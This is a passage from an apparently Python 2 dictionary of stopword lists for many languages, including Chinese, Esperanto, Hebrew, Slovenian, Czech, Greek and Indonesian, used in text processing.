,u"乃",u"乃至",u"么",u"之",u"之一",u"之所以",u"之类",u"乌乎",u"乎",u"乘",u"九",u"也",u"也好",u"也罢",u"了",u"二",u"于",u"于是",u"于是乎",u"云云",u"五",u"人家",u"什么",u"什么样",u"从",u"从而",u"他",u"他人",u"他们",u"以",u"以便",u"以免",u"以及",u"以至",u"以至于",u"以致",u"们",u"任",u"任何",u"任凭",u"似的",u"但",u"但是",u"何",u"何况",u"何处",u"何时",u"作为",u"你",u"你们",u"使得",u"例如",u"依",u"依照",u"俺",u"俺们",u"倘",u"倘使",u"倘或",u"倘然",u"倘若",u"借",u"假使",u"假如",u"假若",u"像",u"八",u"六",u"兮",u"关于",u"其",u"其一",u"其中",u"其二",u"其他",u"其余",u"其它",u"其次",u"具体地说",u"具体说来",u"再者",u"再说",u"冒",u"冲",u"况且",u"几",u"几时",u"凭",u"凭借",u"则",u"别",u"别的",u"别说",u"到",u"前后",u"前者",u"加之",u"即",u"即令",u"即使",u"即便",u"即或",u"即若",u"又",u"及",u"及其",u"及至",u"反之",u"反过来",u"反过来说",u"另",u"另一方面",u"另外",u"只是",u"只有",u"只要",u"只限",u"叫",u"叮咚",u"可",u"可以",u"可是",u"可见",u"各",u"各个",u"各位",u"各种",u"各自",u"同",u"同时",u"向",u"向着",u"吓",u"吗",u"否则",u"吧",u"吧哒",u"吱",u"呀",u"呃",u"呕",u"呗",u"呜",u"呜呼",u"呢",u"呵",u"呸",u"呼哧",u"咋",u"和",u"咚",u"咦",u"咱",u"咱们",u"咳",u"哇",u"哈",u"哈哈",u"哉",u"哎",u"哎呀",u"哎哟",u"哗",u"哟",u"哦",u"哩",u"哪",u"哪个",u"哪些",u"哪儿",u"哪天",u"哪年",u"哪怕",u"哪样",u"哪边",u"哪里",u"哼",u"哼唷",u"唉",u"啊",u"啐",u"啥",u"啦",u"啪达",u"喂",u"喏",u"喔唷",u"嗡嗡",u"嗬",u"嗯",u"嗳",u"嘎",u"嘎登",u"嘘",u"嘛",u"嘻",u"嘿",u"四",u"因",u"因为",u"因此",u"因而",u"固然",u"在",u"在下",u"地",u"多",u"多少",u"她",u"她们",u"如",u"如上所述",u"如何",u"如其",u"如果",u"如此",u"如若",u"宁",u"宁可",u"宁愿",u"宁肯",u"它",u"它们",u"对",u"对于",u"将",u"尔后",u"尚且",u"就",u"就是",u"就是说",u"尽",u"尽管",u"岂但",u"己",u"并",u"并且",u"开外",u"开始",u"归",u"当",u"当着",u"彼",u"彼此",u"往",u"待",u"得",u"怎",u"怎么",u"怎么办",u"怎么样",u"怎样",u"总之",u"总的来看",u"总的来说",u"总的说来",u"总而言之",u"恰恰相反",u"您",u"慢说",u"我",u"我们",u"或",u"或是",u"或者",u"所",u"所以",u"打",u"把",u"抑或",u"拿",u"按",u"按照",u"换句话说",u"换言之",u"据",u"接着",u"故",u"故此",u"旁人",u"无宁",u"无论",u"既",u"既是",u"既然",u"时候",u"是",u"是的",u"替",u"有",u"有些",u"有关",u"有的",u"望",u"朝",u"朝着",u"本",u"本着",u"来",u"来着",u"极了",u"果然",u"果真",u"某",u"某个",u"某些",u"根据",u"正如",u"此",u"此外",u"此间",u"毋宁",u"每",u"每当",u"比",u"比如",u"比方",u"沿",u"沿着",u"漫说",u"焉",u"然则",u"然后",u"然而",u"照",u"照着",u"甚么",u"甚而",u"甚至",u"用",u"由",u"由于",u"由此可见",u"的",u"的话",u"相对而言",u"省得",u"着",u"着呢",u"矣",u"离",u"第",u"等",u"等等",u"管",u"紧接着",u"纵",u"纵令",u"纵使",u"纵然",u"经",u"经过",u"结果",u"给",u"继而",u"综上所述",u"罢了",u"者",u"而",u"而且",u"而况",u"而外",u"而已",u"而是",u"而言",u"能",u"腾",u"自",u"自个儿",u"自从",u"自各儿",u"自家",u"自己",u"自身",u"至",u"至于",u"若",u"若是",u"若非",u"莫若",u"虽",u"虽则",u"虽然",u"虽说",u"被",u"要",u"要不",u"要不是",u"要不然",u"要么",u"要是",u"让",u"论",u"设使",u"设若",u"该",u"诸位",u"谁",u"谁知",u"赶",u"起",u"起见",u"趁",u"趁着",u"越是",u"跟",u"较",u"较之",u"边",u"过",u"还是",u"还有",u"这",u"这个",u"这么",u"这么些",u"这么样",u"这么点儿",u"这些",u"这会儿",u"这儿",u"这就是说",u"这时",u"这样",u"这边",u"这里",u"进而",u"连",u"连同",u"通过",u"遵照",u"那",u"那个",u"那么",u"那么些",u"那么样",u"那些",u"那会儿",u"那儿",u"那时",u"那样",u"那边",u"那里",u"鄙人",u"鉴于",u"阿",u"除",u"除了",u"除此之外",u"除非",u"随",u"随着",u"零",u"非但",u"非徒",u"靠",u"顺",u"顺着",u"首先",u"︿",u"!",u"#",u"$",u"%",u"&",u"(",u")",u"*",u"+",u",",u"0",u"1",u"2",u"3",u"4",u"5",u"6",u"7",u"8",u"9",u":",u";",u"<",u">",u"?",u"@",u"[",u"]",u"{",u"|",u"}",u"~",u"¥"],u"eo":[u"adiaŭ",u"ajn",u"al",u"ankoraŭ",u"antaŭ",u"aŭ",u"bonan",u"bonvole",u"bonvolu",u"bv",u"ci",u"cia",u"cian",u"cin",u"d-ro",u"da",u"de",u"dek",u"deka",u"do",u"doktor'",u"doktoro",u"du",u"dua",u"dum",u"eble",u"ekz",u"ekzemple",u"en",u"estas",u"estis",u"estos",u"estu",u"estus",u"eĉ",u"f-no",u"feliĉan",u"for",u"fraŭlino",u"ha",u"havas",u"havis",u"havos",u"havu",u"havus",u"he",u"ho",u"hu",u"ili",u"ilia",u"ilian",u"ilin",u"inter",u"io",u"ion",u"iu",u"iujn",u"iun",u"ja",u"jam",u"je",u"jes",u"k",u"kaj",u"ke",u"kio",u"kion",u"kiu",u"kiujn",u"kiun",u"kvankam",u"kvar",u"kvara",u"kvazaŭ",u"kvin",u"kvina",u"la",u"li",u"lia",u"lian",u"lin",u"malantaŭ",u"male",u"malgraŭ",u"mem",u"mi",u"mia",u"mian",u"min",u"minus",u"naŭ",u"naŭa",u"ne",u"nek",u"nenio",u"nenion",u"neniu",u"neniun",u"nepre",u"ni",u"nia",u"nian",u"nin",u"nu",u"nun",u"nur",u"ok",u"oka",u"oni",u"onia",u"onian",u"onin",u"plej",u"pli",u"plu",u"plus",u"por",u"post",u"preter",u"s-no",u"s-ro",u"se",u"sed",u"sep",u"sepa",u"ses",u"sesa",u"si",u"sia",u"sian",u"sin",u"sinjor'",u"sinjorino",u"sinjoro",u"sub",u"super",u"supren",u"sur",u"tamen",u"tio",u"tion",u"tiu",u"tiujn",u"tiun",u"tra",u"tri",u"tria",u"tuj",u"tute",u"unu",u"unua",u"ve",u"verŝajne",u"vi",u"via",u"vian",u"vin",u"ĉi",u"ĉio",u"ĉion",u"ĉiu",u"ĉiujn",u"ĉiun",u"ĉu",u"ĝi",u"ĝia",u"ĝian",u"ĝin",u"ĝis",u"ĵus",u"ŝi",u"ŝia",u"ŝin"],u"he":[u"אבל",u"או",u"אולי",u"אותה",u"אותו",u"אותי",u"אותך",u"אותם",u"אותן",u"אותנו",u"אז",u"אחר",u"אחרות",u"אחרי",u"אחריכן",u"אחרים",u"אחרת",u"אי",u"איזה",u"איך",u"אין",u"איפה",u"איתה",u"איתו",u"איתי",u"איתך",u"איתכם",u"איתכן",u"איתם",u"איתן",u"איתנו",u"אך",u"אל",u"אלה",u"אלו",u"אם",u"אנחנו",u"אני",u"אס",u"אף",u"אצל",u"אשר",u"את",u"אתה",u"אתכם",u"אתכן",u"אתם",u"אתן",u"באיזומידה",u"באמצע",u"באמצעות",u"בגלל",u"בין",u"בלי",u"במידה",u"במקוםשבו",u"ברם",u"בשביל",u"בשעהש",u"בתוך",u"גם",u"דרך",u"הוא",u"היא",u"היה",u"היכן",u"היתה",u"היתי",u"הם",u"הן",u"הנה",u"הסיבהשבגללה",u"הרי",u"ואילו",u"ואת",u"זאת",u"זה",u"זות",u"יהיה",u"יוכל",u"יוכלו",u"יותרמדי",u"יכול",u"יכולה",u"יכולות",u"יכולים",u"יכל",u"יכלה",u"יכלו",u"יש",u"כאן",u"כאשר",u"כולם",u"כולן",u"כזה",u"כי",u"כיצד",u"כך",u"ככה",u"כל",u"כלל",u"כמו",u"כן",u"כפי",u"כש",u"לא",u"לאו",u"לאיזותכלית",u"לאן",u"לבין",u"לה",u"להיות",u"להם",u"להן",u"לו",u"לי",u"לכם",u"לכן",u"למה",u"למטה",u"למעלה",u"למקוםשבו",u"למרות",u"לנו",u"לעבר",u"לעיכן",u"לפיכך",u"לפני",u"מאד",u"מאחורי",u"מאיזוסיבה",u"מאין",u"מאיפה",u"מבלי",u"מבעד",u"מדוע",u"מה",u"מהיכן",u"מול",u"מחוץ",u"מי",u"מכאן",u"מכיוון",u"מלבד",u"מן",u"מנין",u"מסוגל",u"מעט",u"מעטים",u"מעל",u"מצד",u"מקוםבו",u"מתחת",u"מתי",u"נגד",u"נגר",u"נו",u"עד",u"עז",u"על",u"עלי",u"עליה",u"עליהם",u"עליהן",u"עליו",u"עליך",u"עליכם",u"עלינו",u"עם",u"עצמה",u"עצמהם",u"עצמהן",u"עצמו",u"עצמי",u"עצמם",u"עצמן",u"עצמנו",u"פה",u"רק",u"שוב",u"של",u"שלה",u"שלהם",u"שלהן",u"שלו",u"שלי",u"שלך",u"שלכה",u"שלכם",u"שלכן",u"שלנו",u"שם",u"תהיה",u"תחת"],u"la":[u"a",u"ab",u"ac",u"ad",u"at",u"atque",u"aut",u"autem",u"cum",u"de",u"dum",u"e",u"erant",u"erat",u"est",u"et",u"etiam",u"ex",u"haec",u"hic",u"hoc",u"in",u"ita",u"me",u"nec",u"neque",u"non",u"per",u"qua",u"quae",u"quam",u"qui",u"quibus",u"quidem",u"quo",u"quod",u"re",u"rebus",u"rem",u"res",u"sed",u"si",u"sic",u"sunt",u"tamen",u"tandem",u"te",u"ut",u"vel"],u"sk":[u"a",u"aby",u"aj",u"ako",u"aký",u"ale",u"alebo",u"ani",u"avšak",u"ba",u"bez",u"buï",u"cez",u"do",u"ho",u"hoci",u"i",u"ich",u"im",u"ja",u"jeho",u"jej",u"jemu",u"ju",u"k",u"kam",u"kde",u"kedže",u"keï",u"kto",u"ktorý",u"ku",u"lebo",u"ma",u"mi",u"mne",u"mnou",u"mu",u"my",u"mòa",u"môj",u"na",u"nad",u"nami",u"neho",u"nej",u"nemu",u"nich",u"nielen",u"nim",u"no",u"nám",u"nás",u"náš",u"ním",u"o",u"od",u"on",u"ona",u"oni",u"ono",u"ony",u"po",u"pod",u"pre",u"pred",u"pri",u"s",u"sa",u"seba",u"sem",u"so",u"svoj",u"taký",u"tam",u"teba",u"tebe",u"tebou",u"tej",u"ten",u"ti",u"tie",u"to",u"toho",u"tomu",u"tou",u"tvoj",u"ty",u"tá",u"tým",u"v",u"vami",u"veï",u"vo",u"vy",u"vám",u"vás",u"váš",u"však",u"z",u"za",u"zo",u"a",u"èi",u"èo",u"èí",u"òom",u"òou",u"òu",u"že"],u"sl":[u"a",u"ali",u"april",u"avgust",u"b",u"bi",u"bil",u"bila",u"bile",u"bili",u"bilo",u"biti",u"blizu",u"bo",u"bodo",u"bojo",u"bolj",u"bom",u"bomo",u"boste",u"bova",u"boš",u"brez",u"c",u"cel",u"cela",u"celi",u"celo",u"d",u"da",u"daleč",u"dan",u"danes",u"datum",u"december",u"deset",u"deseta",u"deseti",u"deseto",u"devet",u"deveta",u"deveti",u"deveto",u"do",u"dober",u"dobra",u"dobri",u"dobro",u"dokler",u"dol",u"dolg",u"dolga",u"dolgi",u"dovolj",u"drug",u"druga",u"drugi",u"drugo",u"dva",u"dve",u"e",u"eden",u"en",u"ena",u"ene",u"eni",u"enkrat",u"eno",u"etc.",u"f",u"februar",u"g",u"g.",u"ga",u"ga.",u"gor",u"gospa",u"gospod",u"h",u"halo",u"i",u"idr.",u"ii",u"iii",u"in",u"iv",u"ix",u"iz",u"j",u"januar",u"jaz",u"je",u"ji",u"jih",u"jim",u"jo",u"julij",u"junij",u"jutri",u"k",u"kadarkoli",u"kaj",u"kajti",u"kako",u"kakor",u"kamor",u"kamorkoli",u"kar",u"karkoli",u"katerikoli",u"kdaj",u"kdo",u"kdorkoli",u"ker",u"ki",u"kje",u"kjer",u"kjerkoli",u"ko",u"koder",u"koderkoli",u"koga",u"komu",u"kot",u"kratek",u"kratka",u"kratke",u"kratki",u"l",u"lahka",u"lahke",u"lahki",u"lahko",u"le",u"lep",u"lepa",u"lepe",u"lepi",u"lepo",u"leto",u"m",u"maj",u"majhen",u"majhna",u"majhni",u"malce",u"malo",u"manj",u"marec",u"me",u"med",u"medtem",u"mene",u"mesec",u"mi",u"midva",u"midve",u"mnogo",u"moj",u"moja",u"moje",u"mora",u"morajo",u"moram",u"moramo",u"morate",u"moraš",u"morem",u"mu",u"n",u"na",u"nad",u"naj",u"najina",u"najino",u"najmanj",u"naju",u"največ",u"nam",u"narobe",u"nas",u"nato",u"nazaj",u"naš",u"naša",u"naše",u"ne",u"nedavno",u"nedelja",u"nek",u"neka",u"nekaj",u"nekatere",u"nekateri",u"nekatero",u"nekdo",u"neke",u"nekega",u"neki",u"nekje",u"neko",u"nekoga",u"nekoč",u"ni",u"nikamor",u"nikdar",u"nikjer",u"nikoli",u"nič",u"nje",u"njega",u"njegov",u"njegova",u"njegovo",u"njej",u"njemu",u"njen",u"njena",u"njeno",u"nji",u"njih",u"njihov",u"njihova",u"njihovo",u"njiju",u"njim",u"njo",u"njun",u"njuna",u"njuno",u"no",u"nocoj",u"november",u"npr.",u"o",u"ob",u"oba",u"obe",u"oboje",u"od",u"odprt",u"odprta",u"odprti",u"okoli",u"oktober",u"on",u"onadva",u"one",u"oni",u"onidve",u"osem",u"osma",u"osmi",u"osmo",u"oz.",u"p",u"pa",u"pet",u"peta",u"petek",u"peti",u"peto",u"po",u"pod",u"pogosto",u"poleg",u"poln",u"polna",u"polni",u"polno",u"ponavadi",u"ponedeljek",u"ponovno",u"potem",u"povsod",u"pozdravljen",u"pozdravljeni",u"prav",u"prava",u"prave",u"pravi",u"pravo",u"prazen",u"prazna",u"prazno",u"prbl.",u"precej",u"pred",u"prej",u"preko",u"pri",u"pribl.",u"približno",u"primer",u"pripravljen",u"pripravljena",u"pripravljeni",u"proti",u"prva",u"prvi",u"prvo",u"r",u"ravno",u"redko",u"res",u"reč",u"s",u"saj",u"sam",u"sama",u"same",u"sami",u"samo",u"se",u"sebe",u"sebi",u"sedaj",u"sedem",u"sedma",u"sedmi",u"sedmo",u"sem",u"september",u"seveda",u"si",u"sicer",u"skoraj",u"skozi",u"slab",u"smo",u"so",u"sobota",u"spet",u"sreda",u"srednja",u"srednji",u"sta",u"ste",u"stran",u"stvar",u"sva",u"t",u"ta",u"tak",u"taka",u"take",u"taki",u"tako",u"takoj",u"tam",u"te",u"tebe",u"tebi",u"tega",u"težak",u"težka",u"težki",u"težko",u"ti",u"tista",u"tiste",u"tisti",u"tisto",u"tj.",u"tja",u"to",u"toda",u"torek",u"tretja",u"tretje",u"tretji",u"tri",u"tu",u"tudi",u"tukaj",u"tvoj",u"tvoja",u"tvoje",u"u",u"v",u"vaju",u"vam",u"vas",u"vaš",u"vaša",u"vaše",u"ve",u"vedno",u"velik",u"velika",u"veliki",u"veliko",u"vendar",u"ves",u"več",u"vi",u"vidva",u"vii",u"viii",u"visok",u"visoka",u"visoke",u"visoki",u"vsa",u"vsaj",u"vsak",u"vsaka",u"vsakdo",u"vsake",u"vsaki",u"vsakomur",u"vse",u"vsega",u"vsi",u"vso",u"včasih",u"včeraj",u"x",u"z",u"za",u"zadaj",u"zadnji",u"zakaj",u"zaprta",u"zaprti",u"zaprto",u"zdaj",u"zelo",u"zunaj",u"č",u"če",u"često",u"četrta",u"četrtek",u"četrti",u"četrto",u"čez",u"čigav",u"š",u"šest",u"šesta",u"šesti",u"šesto",u"štiri",u"ž",u"že"],u"br":[u"a",u"ainda",u"alem",u"ambas",u"ambos",u"antes",u"ao",u"aonde",u"aos",u"apos",u"aquele",u"aqueles",u"as",u"assim",u"com",u"como",u"contra",u"contudo",u"cuja",u"cujas",u"cujo",u"cujos",u"da",u"das",u"de",u"dela",u"dele",u"deles",u"demais",u"depois",u"desde",u"desta",u"deste",u"dispoe",u"dispoem",u"diversa",u"diversas",u"diversos",u"do",u"dos",u"durante",u"e",u"ela",u"elas",u"ele",u"eles",u"em",u"entao",u"entre",u"essa",u"essas",u"esse",u"esses",u"esta",u"estas",u"este",u"estes",u"ha",u"isso",u"isto",u"logo",u"mais",u"mas",u"mediante",u"menos",u"mesma",u"mesmas",u"mesmo",u"mesmos",u"na",u"nao",u"nas",u"nem",u"nesse",u"neste",u"nos",u"o",u"os",u"ou",u"outra",u"outras",u"outro",u"outros",u"pelas",u"pelo",u"pelos",u"perante",u"pois",u"por",u"porque",u"portanto",u"propios",u"proprio",u"quais",u"qual",u"qualquer",u"quando",u"quanto",u"que",u"quem",u"quer",u"se",u"seja",u"sem",u"sendo",u"seu",u"seus",u"sob",u"sobre",u"sua",u"suas",u"tal",u"tambem",u"teu",u"teus",u"toda",u"todas",u"todo",u"todos",u"tua",u"tuas",u"tudo",u"um",u"uma",u"umas",u"uns"],u"ca":[u"a",u"abans",u"ací",u"ah",u"així",u"això",u"al",u"aleshores",u"algun",u"alguna",u"algunes",u"alguns",u"alhora",u"allà",u"allí",u"allò",u"als",u"altra",u"altre",u"altres",u"amb",u"ambdues",u"ambdós",u"apa",u"aquell",u"aquella",u"aquelles",u"aquells",u"aquest",u"aquesta",u"aquestes",u"aquests",u"aquí",u"baix",u"cada",u"cadascuna",u"cadascunes",u"cadascuns",u"cadascú",u"com",u"contra",u"d'un",u"d'una",u"d'unes",u"d'uns",u"dalt",u"de",u"del",u"dels",u"des",u"després",u"dins",u"dintre",u"donat",u"doncs",u"durant",u"e",u"eh",u"el",u"els",u"em",u"en",u"encara",u"ens",u"entre",u"eren",u"es",u"esta",u"estaven",u"esteu",u"està",u"estàvem",u"estàveu",u"et",u"etc",u"ets",u"fins",u"fora",u"gairebé",u"ha",u"han",u"has",u"havia",u"he",u"hem",u"heu",u"hi",u"ho",u"i",u"igual",u"iguals",u"ja",u"l'hi",u"la",u"les",u"li",u"li'n",u"llavors",u"m'he",u"ma",u"mal",u"malgrat",u"mateix",u"mateixa",u"mateixes",u"mateixos",u"me",u"mentre",u"meu",u"meus",u"meva",u"meves",u"molt",u"molta",u"moltes",u"molts",u"mon",u"mons",u"més",u"n'he",u"n'hi",u"ne",u"ni",u"no",u"nogensmenys",u"només",u"nosaltres",u"nostra",u"nostre",u"nostres",u"o",u"oh",u"oi",u"on",u"pas",u"pel",u"pels",u"per",u"perquè",u"però",u"poc",u"poca",u"pocs",u"poques",u"potser",u"propi",u"qual",u"quals",u"quan",u"quant",u"que",u"quelcom",u"qui",u"quin",u"quina",u"quines",u"quins",u"què",u"s'ha",u"s'han",u"sa",u"semblant",u"semblants",u"ses",u"seu",u"seus",u"seva",u"seves",u"si",u"sobre",u"sobretot",u"solament",u"sols",u"son",u"sons",u"sota",u"sou",u"sóc",u"són",u"t'ha",u"t'han",u"t'he",u"ta",u"tal",u"també",u"tampoc",u"tan",u"tant",u"tanta",u"tantes",u"teu",u"teus",u"teva",u"teves",u"ton",u"tons",u"tot",u"tota",u"totes",u"tots",u"un",u"una",u"unes",u"uns",u"us",u"va",u"vaig",u"vam",u"van",u"vas",u"veu",u"vosaltres",u"vostra",u"vostre",u"vostres",u"érem",u"éreu",u"és"],u"cs":[u"a",u"aby",u"ahoj",u"aj",u"ale",u"anebo",u"ani",u"ano",u"asi",u"aspoň",u"atd",u"atp",u"ačkoli",u"až",u"bez",u"beze",u"blízko",u"bohužel",u"brzo",u"bude",u"budem",u"budeme",u"budete",u"budeš",u"budou",u"budu",u"by",u"byl",u"byla",u"byli",u"bylo",u"byly",u"bys",u"být",u"během",u"chce",u"chceme",u"chcete",u"chceš",u"chci",u"chtít",u"chtějí",u"chut'",u"chuti",u"co",u"což",u"cz",u"daleko",u"další",u"den",u"deset",u"devatenáct",u"devět",u"dnes",u"do",u"dobrý",u"docela",u"dva",u"dvacet",u"dvanáct",u"dvě",u"dál",u"dále",u"děkovat",u"děkujeme",u"děkuji",u"ho",u"hodně",u"i",u"jak",u"jakmile",u"jako",u"jakož",u"jde",u"je",u"jeden",u"jedenáct",u"jedna",u"jedno",u"jednou",u"jedou",u"jeho",u"jehož",u"jej",u"jejich",u"její",u"jelikož",u"jemu",u"jen",u"jenom",u"jestli",u"jestliže",u"ještě",u"jež",u"ji",u"jich",u"jimi",u"jinak",u"jiné",u"již",u"jsem",u"jseš",u"jsi",u"jsme",u"jsou",u"jste",u"já",u"jí",u"jím",u"jíž",u"k",u"kam",u"kde",u"kdo",u"kdy",u"když",u"ke",u"kolik",u"kromě",u"kterou",u"která",u"které",u"který",u"kteří",u"kvůli",u"mají",u"mezi",u"mi",u"mne",u"mnou",u"mně",u"moc",u"mohl",u"mohou",u"moje",u"moji",u"možná",u"musí",u"my",u"má",u"málo",u"mám",u"máme",u"máte",u"máš",u"mé",u"mí",u"mít",u"mě",u"můj",u"může",u"na",u"nad",u"nade",u"napište",u"naproti",u"načež",u"naše",u"naši",u"ne",u"nebo",u"nebyl",u"nebyla",u"nebyli",u"nebyly",u"nedělají",u"nedělá",u"nedělám",u"neděláme",u"neděláte",u"neděláš",u"neg",u"nejsi",u"nejsou",u"nemají",u"nemáme",u"nemáte",u"neměl",u"není",u"nestačí",u"nevadí",u"než",u"nic",u"nich",u"nimi",u"nové",u"nový",u"nula",u"nám",u"námi",u"nás",u"náš",u"ním",u"ně",u"něco",u"nějak",u"někde",u"někdo",u"němu",u"němuž",u"o",u"od",u"ode",u"on",u"ona",u"oni",u"ono",u"ony",u"osm",u"osmnáct",u"pak",u"patnáct",u"po",u"pod",u"podle",u"pokud",u"potom",u"pouze",u"pozdě",u"pořád",u"pravé",u"pro",u"prostě",u"prosím",u"proti",u"proto",u"protože",u"proč",u"první",u"pta",u"pět",u"před",u"přes",u"přese",u"při",u"přičemž",u"re",u"rovně",u"s",u"se",u"sedm",u"sedmnáct",u"si",u"skoro",u"smí",u"smějí",u"snad",u"spolu",u"sta",u"sto",u"strana",u"sté",u"své",u"svých",u"svým",u"svými",u"ta",u"tady",u"tak",u"takhle",u"taky",u"také",u"takže",u"tam",u"tamhle",u"tamhleto",u"tamto",u"tato",u"tebe",u"tebou",u"ted'",u"tedy",u"ten",u"tento",u"teto",u"ti",u"tipy",u"tisíc",u"tisíce",u"to",u"tobě",u"tohle",u"toho",u"tohoto",u"tom",u"tomto",u"tomu",u"tomuto",u"toto",u"trošku",u"tu",u"tuto",u"tvoje",u"tvá",u"tvé",u"tvůj",u"ty",u"tyto",u"téma",u"tím",u"tímto",u"tě",u"těm",u"těmu",u"třeba",u"tři",u"třináct",u"u",u"určitě",u"už",u"v",u"vaše",u"vaši",u"ve",u"vedle",u"večer",u"vlastně",u"vy",u"vám",u"vámi",u"vás",u"váš",u"více",u"však",u"všechno",u"všichni",u"vůbec",u"vždy",u"z",u"za",u"zatímco",u"zač",u"zda",u"zde",u"ze",u"zprávy",u"zpět",u"čau",u"či",u"článku",u"články",u"čtrnáct",u"čtyři",u"šest",u"šestnáct",u"že"],u"el":[u"αλλα",u"αν",u"αντι",u"απο",u"αυτα",u"αυτεσ",u"αυτη",u"αυτο",u"αυτοι",u"αυτοσ",u"αυτουσ",u"αυτων",u"για",u"δε",u"δεν",u"εαν",u"ειμαι",u"ειμαστε",u"ειναι",u"εισαι",u"ειστε",u"εκεινα",u"εκεινεσ",u"εκεινη",u"εκεινο",u"εκεινοι",u"εκεινοσ",u"εκεινουσ",u"εκεινων",u"ενω",u"επι",u"η",u"θα",u"ισωσ",u"κ",u"και",u"κατα",u"κι",u"μα",u"με",u"μετα",u"μη",u"μην",u"να",u"ο",u"οι",u"ομωσ",u"οπωσ",u"οσο",u"οτι",u"παρα",u"ποια",u"ποιεσ",u"ποιο",u"ποιοι",u"ποιοσ",u"ποιουσ",u"ποιων",u"που",u"προσ",u"πωσ",u"σε",u"στη",u"στην",u"στο",u"στον",u"τα",u"την",u"τησ",u"το",u"τον",u"τοτε",u"του",u"των",u"ωσ"],u"eu":[u"al",u"anitz",u"arabera",u"asko",u"baina",u"bat",u"batean",u"batek",u"bati",u"batzuei",u"batzuek",u"batzuetan",u"batzuk",u"bera",u"beraiek",u"berau",u"berauek",u"bere",u"berori",u"beroriek",u"beste",u"bezala",u"da",u"dago",u"dira",u"ditu",u"du",u"dute",u"edo",u"egin",u"ere",u"eta",u"eurak",u"ez",u"gainera",u"gu",u"gutxi",u"guzti",u"haiei",u"haiek",u"haietan",u"hainbeste",u"hala",u"han",u"handik",u"hango",u"hara",u"hari",u"hark",u"hartan",u"hau",u"hauei",u"hauek",u"hauetan",u"hemen",u"hemendik",u"hemengo",u"hi",u"hona",u"honek",u"honela",u"honetan",u"honi",u"hor",u"hori",u"horiei",u"horiek",u"horietan",u"horko",u"horra",u"horrek",u"horrela",u"horretan",u"horri",u"hortik",u"hura",u"izan",u"ni",u"noiz",u"nola",u"non",u"nondik",u"nongo",u"nor",u"nora",u"ze",u"zein",u"zen",u"zenbait",u"zenbat",u"zer",u"zergatik",u"ziren",u"zituen",u"zu",u"zuek",u"zuen",u"zuten"],u"ga":[u"a",u"ach",u"ag",u"agus",u"an",u"aon",u"ar",u"arna",u"as",u"b'",u"ba",u"beirt",u"bhúr",u"caoga",u"ceathair",u"ceathrar",u"chomh",u"chtó",u"chuig",u"chun",u"cois",u"céad",u"cúig",u"cúigear",u"d'",u"daichead",u"dar",u"de",u"deich",u"deichniúr",u"den",u"dhá",u"do",u"don",u"dtí",u"dá",u"dár",u"dó",u"faoi",u"faoin",u"faoina",u"faoinár",u"fara",u"fiche",u"gach",u"gan",u"go",u"gur",u"haon",u"hocht",u"i",u"iad",u"idir",u"in",u"ina",u"ins",u"inár",u"is",u"le",u"leis",u"lena",u"lenár",u"m'",u"mar",u"mo",u"mé",u"na",u"nach",u"naoi",u"naonúr",u"ná",u"ní",u"níor",u"nó",u"nócha",u"ocht",u"ochtar",u"os",u"roimh",u"sa",u"seacht",u"seachtar",u"seachtó",u"seasca",u"seisear",u"siad",u"sibh",u"sinn",u"sna",u"sé",u"sí",u"tar",u"thar",u"thú",u"triúr",u"trí",u"trína",u"trínár",u"tríocha",u"tú",u"um",u"ár",u"é",u"éis",u"í",u"ó",u"ón",u"óna",u"ónár"],u"gl":[u"a",u"alí",u"ao",u"aos",u"aquel",u"aquela",u"aquelas",u"aqueles",u"aquilo",u"aquí",u"as",u"así",u"aínda",u"ben",u"cando",u"che",u"co",u"coa",u"coas",u"comigo",u"con",u"connosco",u"contigo",u"convosco",u"cos",u"cun",u"cunha",u"cunhas",u"cuns",u"da",u"dalgunha",u"dalgunhas",u"dalgún",u"dalgúns",u"das",u"de",u"del",u"dela",u"delas",u"deles",u"desde",u"deste",u"do",u"dos",u"dun",u"dunha",u"dunhas",u"duns",u"e",u"el",u"ela",u"elas",u"eles",u"en",u"era",u"eran",u"esa",u"esas",u"ese",u"eses",u"esta",u"estaba",u"estar",u"este",u"estes",u"estiven",u"estou",u"está",u"están",u"eu",u"facer",u"foi",u"foron",u"fun",u"había",u"hai",u"iso",u"isto",u"la",u"las",u"lle",u"lles",u"lo",u"los",u"mais",u"me",u"meu",u"meus",u"min",u"miña",u"miñas",u"moi",u"na",u"nas",u"neste",u"nin",u"no",u"non",u"nos",u"nosa",u"nosas",u"noso",u"nosos",u"nun",u"nunha",u"nunhas",u"nuns",u"nós",u"o",u"os",u"ou",u"para",u"pero",u"pode",u"pois",u"pola",u"polas",u"polo",u"polos",u"por",u"que",u"se",u"senón",u"ser",u"seu",u"seus",u"sexa",u"sido",u"sobre",u"súa",u"súas",u"tamén",u"tan",u"te",u"ten",u"ter",u"teu",u"teus",u"teñen",u"teño",u"ti",u"tido",u"tiven",u"tiña",u"túa",u"túas",u"un",u"unha",u"unhas",u"uns",u"vos",u"vosa",u"vosas",u"voso",u"vosos",u"vós",u"á",u"é",u"ó",u"ós"],u"hy":[u"այդ",u"այլ",u"այն",u"այս",u"դու",u"դուք",u"եմ",u"են",u"ենք",u"ես",u"եք",u"է",u"էի",u"էին",u"էինք",u"էիր",u"էիք",u"էր",u"ըստ",u"թ",u"ի",u"ին",u"իսկ",u"իր",u"կամ",u"համար",u"հետ",u"հետո",u"մենք",u"մեջ",u"մի",u"ն",u"նա",u"նաև",u"նրա",u"նրանք",u"որ",u"որը",u"որոնք",u"որպես",u"ու",u"ում",u"պիտի",u"վրա",u"և"],u"id":[u"ada",u"adalah",u"adanya",u"adapun",u"agak",u"agaknya",u"agar",u"akan",u"akankah",u"akhirnya",u"aku",u"akulah",u"amat",u"amatlah",u"anda",u"andalah",u"antar",u"antara",u"antaranya",u"apa",u"apaan",u"apabila",u"apakah",u"apalagi",u"apatah",u"atau",u"ataukah",u"ataupun",u"bagai",u"bagaikan",u"bagaimana",u"bagaimanakah",u"bagaimanapun",u"bagi",u"bahkan",u"bahwa",u"bahwasanya",u"banyak",u"beberapa",u"begini",u"beginian",u"beginikah",u"beginilah",u"begitu",u"begitukah",u"begitulah",u"begitupun",u"belum",u"belumlah",u"berapa",u"berapakah",u"berapalah",u"berapapun",u"bermacam",u"bersama",u"betulkah",u"biasa",u"biasanya",u"bila",u"bilakah",u"bisa",u"bisakah",u"boleh",u"bolehkah",u"bolehlah",u"buat",u"bukan",u"bukankah",u"bukanlah",u"bukannya",u"cuma",u"dahulu",u"dalam",u"dan",u"dapat",u"dari",u"daripada",u"dekat",u"demi",u"demikian",u"demikianlah",u"dengan",u"depan",u"di",u"dia",u"dialah",u"diantara",u"diantaranya",u"dikarenakan",u"dini",u"diri",u"diri